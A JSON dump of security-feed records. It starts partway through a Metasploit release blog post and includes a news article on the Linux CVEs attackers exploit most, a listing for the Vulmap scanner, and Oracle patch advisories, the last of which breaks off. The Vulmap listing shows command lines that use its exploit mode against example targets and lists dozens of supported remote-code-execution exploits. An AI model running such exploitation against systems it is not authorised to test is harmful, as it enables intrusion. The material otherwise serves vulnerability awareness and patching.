[jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.\n * PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.\n * PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a x86 linux bind shell payloads socket closing bug.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)\n * [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-01-08T19:54:36", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260"], "modified": "2021-01-08T19:54:36", "id": "RAPID7BLOG:5482AC1594C82A230828023816657B57", "href": "https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[![](https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg)](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[![](https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg)](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[![](https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg)](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-12-07T20:52:38", "description": "[![](https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s16000/vulmap.png)](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-12-07T20:10:36", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 329 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2739494.1>).\n\n**Please note that since the release of the October 2020 Critical Patch Update, Oracle has released a Security Alert for Oracle WebLogic Server: [CVE-2020-14750 (November 1, 2020)](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html>). Customers are strongly advised to apply this Critical Patch Update, which includes patches for this Alert as well as additional patches.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2098", "CVE-2015-4000", "CVE-2015-8965", "CVE-2016-1000031", "CVE-2016-5725", "CVE-2017-12626", "CVE-2017-5611", "CVE-2017-5645", "CVE-2017-8028", "CVE-2018-0732", "CVE-2018-10237", "CVE-2018-11775", "CVE-2018-1258", "CVE-2018-1285", "CVE-2018-15756", "CVE-2018-20781", "CVE-2018-2587", "CVE-2018-7318", "CVE-2018-8032", "CVE-2018-9019", "CVE-2019-0188", "CVE-2019-0227", "CVE-2019-0230", "CVE-2019-0233", "CVE-2019-10086", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11135", "CVE-2019-11269", "CVE-2019-11358", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-13990", "CVE-2019-14862", "CVE-2019-1551", "CVE-2019-1559", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17563", "CVE-2019-17566", "CVE-2019-17569", "CVE-2019-20892", "CVE-2019-20907", "CVE-2019-2697", "CVE-2019-3773", "CVE-2019-3778", "CVE-2019-5427", "CVE-2019-7164", "CVE-2019-7548", "CVE-2019-9511", "CVE-2019-9513", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10725", "CVE-2020-10726", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11612", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11979", "CVE-2020-11984", "CVE-2020-11985", "CVE-2020-11993", "CVE-2020-11994", "CVE-2020-11996", "CVE-2020-11998", "CVE-2020-12723", "CVE-2020-13254", "CVE-2020-13596", "CVE-2020-13871", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-13954", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14147", "CVE-2020-14195", "CVE-2020-14422", "CVE-2020-14750", "CVE-2020-14756", "CVE-2020-14803", "CVE-2020-15025", "CVE-2020-15358", "CVE-2020-17498", "CVE-2020-17521", "CVE-2020-17530", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1945", "CVE-2020-1967", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24583", "CVE-2020-24584", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-25020", "CVE-2020-2555", "CVE-2020-25862", "CVE-2020-25863", "CVE-2020-25866", "CVE-2020-26575", "CVE-2020-27216", "CVE-2020-35460", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-5421", "CVE-2020-7064", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8265", "CVE-2020-8277", "CVE-2020-8287", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548", "CVE-2021-1993", "CVE-2021-1994", "CVE-2021-1995", "CVE-2021-1996", "CVE-2021-1997", "CVE-2021-1998", "CVE-2021-1999", "CVE-2021-2000", "CVE-2021-2001", "CVE-2021-2002", "CVE-2021-2003", "CVE-2021-2004", "CVE-2021-2005", "CVE-2021-2006", "CVE-2021-2007", "CVE-2021-2009", "CVE-2021-2010", "CVE-2021-2011", "CVE-2021-2012", "CVE-2021-2013", "CVE-2021-2014", "CVE-2021-2015", "CVE-2021-2016", "CVE-2021-2017", "CVE-2021-2018", "CVE-2021-2019", "CVE-2021-2020", "CVE-2021-2021", "CVE-2021-2022", "CVE-2021-2023", "CVE-2021-2024", "CVE-2021-2025", "CVE-2021-2026", "CVE-2021-2027", "CVE-2021-2028", "CVE-2021-2029", "CVE-2021-2030", "CVE-2021-2031", "CVE-2021-2032", "CVE-2021-2033", "CVE-2021-2034", "CVE-2021-2035", "CVE-2021-2036", "CVE-2021-2038", "CVE-2021-2039", "CVE-2021-2040", "CVE-2021-2041", "CVE-2021-2042", "CVE-2021-2043", "CVE-2021-2044", "CVE-2021-2045", "CVE-2021-2046", "CVE-2021-2047", "CVE-2021-2048", "CVE-2021-2049", "CVE-2021-2050", "CVE-2021-2051", "CVE-2021-2052", "CVE-2021-2054", "CVE-2021-2055", "CVE-2021-2056", "CVE-2021-2057", "CVE-2021-2058", "CVE-2021-2059", "CVE-2021-2060", "CVE-2021-2061", "CVE-2021-2062", "CVE-2021-2063", "CVE-2021-2064", "CVE-2021-2065", "CVE-2021-2066", "CVE-2021-2067", "CVE-2021-2068", "CVE-2021-2069", "CVE-2021-2070", "CVE-2021-2071", "CVE-2021-2072", "CVE-2021-2073", "CVE-2021-2074", "CVE-2021-2075", "CVE-2021-2076", "CVE-2021-2077", "CVE-2021-2078", "CVE-2021-2079", "CVE-2021-2080", "CVE-2021-2081", "CVE-2021-2082", "CVE-2021-2083", "CVE-2021-2084", "CVE-2021-2085", "CVE-2021-2086", "CVE-2021-2087", "CVE-2021-2088", "CVE-2021-2089", "CVE-2021-2090", "CVE-2021-2091", "CVE-2021-2092", "CVE-2021-2093", "CVE-2021-2094", "CVE-2021-2096", "CVE-2021-2097", "CVE-2021-2098", "CVE-2021-2099", "CVE-2021-2100", "CVE-2021-2101", "CVE-2021-2102", "CVE-2021-2103", "CVE-2021-2104", "CVE-2021-2105", "CVE-2021-2106", "CVE-2021-2107", "CVE-2021-2108", "CVE-2021-2109", "CVE-2021-2110", "CVE-2021-2111", "CVE-2021-2112", "CVE-2021-2113", "CVE-2021-2114", "CVE-2021-2115", "CVE-2021-2116", "CVE-2021-2117", "CVE-2021-2118", "CVE-2021-2119", "CVE-2021-2120", "CVE-2021-2121", "CVE-2021-2122", "CVE-2021-2123", "CVE-2021-2124", "CVE-2021-2125", "CVE-2021-2126", "CVE-2021-2127", "CVE-2021-2128", "CVE-2021-2129", "CVE-2021-2130", "CVE-2021-2131"], "modified": "2021-02-22T00:00:00", "id": "ORACLE:CPUJAN2021", "href": "https://www.oracle.com/security-alerts/cpujan2021.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T20:11:16", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 419 new security patches across the product families listed 